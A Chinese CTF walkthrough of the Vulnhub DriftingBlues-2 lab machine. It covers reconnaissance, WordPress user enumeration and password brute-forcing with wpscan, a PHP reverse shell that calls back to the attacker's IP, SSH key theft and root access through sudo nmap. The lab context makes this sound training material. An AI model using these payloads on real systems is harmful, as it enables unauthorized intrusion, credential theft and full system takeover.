Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。
Vulnhub靶机下载:
官网地址:https://www.vulnhub.com/entry/driftingblues-2,634/
下载好了把安装包解压 然后试用VMware即可。
Vulnhub靶机漏洞详解:
前言:
这里扫不到靶机 解决方法:
在开机时按下Shift
键进入界面*
- 按e 键,进入该界面
- 将
ro
替换为rw signie init=/bin/bash
- 按
Ctrl键+X键
如果没成功说明配置错了需要从新继续配置 如果是下面这个界面说明配置成功。
- 查看 当前网卡IP信息
ip a
- 发现网卡是
ens33
继续编辑网卡配置文件vim /etc/network/interfaces
- 重启网卡:
/etc/init.d/networking restart
再次ip a
查看 发现有了 然后 进行测试
由于我这里DHCP
获取到了IP
nmap
也扫描不了 我改为了NAT
模式 但是上面这个是环境的配置方法
①:信息收集:
kali里使用netdiscover
发现主机
渗透机:kali IP :192.168.116.130 靶机IP :192.168.116.129
使用命令:
nmap -sS -A -T4 -n 192.168.116.129
发现开启了三个端口分别是21,22,80
但是这次多了一个端口 21
端口 之前没碰到过 所以要留意一下 可以尝试一下匿名登入
ftp 192.168.116.129
用户名:anonymous
密码:空
登入成功后 发现有一张图片 使用get
下载 是一张很普通的图片 尝试可能存在 隐写图片 使用binwalk -e
发现没有
然后访问一下80
端口,使用工具dirb
进行扫描 发现了blog
可以提测是博客网站,在网站最下面发现该CMS
是WordpPress
这个 之前DC系列靶机做过的需要修改 hosts
文件 vim /etc/hosts
使用命令: wpscan --url http://driftingblues.box/blog -e u
再次进行扫描 发现了账号:albert
②:暴力破解:
使用wpscan
进行暴力破解,既然知道了用户是albert
使用命令: 得到密码为:scotland1
wpscan --url http://driftingblues.box/blog/ --passwords /usr/share/wordlists/rockyou.txt --usernames albert
③:漏洞利用:
方法①:直接打开msfconsole
使用模块:exploit/unix/webapp/wp_admin_shell_upload
配置如图 但是最后run
的时候会显示失败 这也是一种方法 如果上面那种不行可以试一下这个(我这里失败了但不影响!)
④:反弹shell:
方法②:使用kaili
访问 /blog/wp-login.php
输入账号密码 登入成功!!
$ip="192.168.116.130";
$port=3333;
$sock=fsockopen($ip, $port);
$descriptorspec=array(
0=>$sock,
1=>$sock,
2=>$sock
);
$process=proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
在kaili
监听3333
端口 然后访问一个不存在的页面反弹shell
反弹成功!!!
http://driftingblues.box/blog/index.php/xxx
使用命令:python -c 'import pty; pty.spawn("/bin/bash")'
进入home/freddie
发现了一个ssh
私钥文件 进行查看并且复制下来
⑤:nmap提权:
现在可以看 user.txt
了 找到了第一个flag
这里可以使用nmap
提权(之前DC系列用到过 再做一遍!)
echo "os.execute('/bin/bash')" > getshell
sudo nmap --script=getshell
⑥:获取flag:
至此获取到了所有得flag,渗透测试结束。
Vulnhub靶机渗透总结:
1.解决扫不到靶机的问题(第一次遇到这种情况)
2.学习了wpscan
工具的使用
3.msf
使用exploit/unix/webapp/wp_admin_shell_upload
模块
4.回顾了nmap
提权(这里是看不到输入的 直接打命令就行)
5.这次出现了21
端口匿名登入以及ssh
私钥登入 (新知识点)